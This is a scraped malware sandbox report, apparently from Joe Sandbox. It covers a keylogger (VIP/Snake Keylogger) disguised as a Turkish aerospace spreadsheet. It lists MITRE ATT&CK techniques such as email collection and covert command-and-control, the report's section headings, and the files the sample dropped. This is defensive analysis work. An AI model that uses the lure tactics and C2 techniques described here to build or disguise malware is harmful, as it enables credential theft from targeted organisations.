Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xSjByRHuwGV.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awjudaub.skb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqguczlw.pck.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjdqk2t.cpl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpzdst1c.kq5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qur35mpn.hrj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tze4fb5c.skr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvkytmxe.3cj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwxvo1b2.zqg.ps1

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre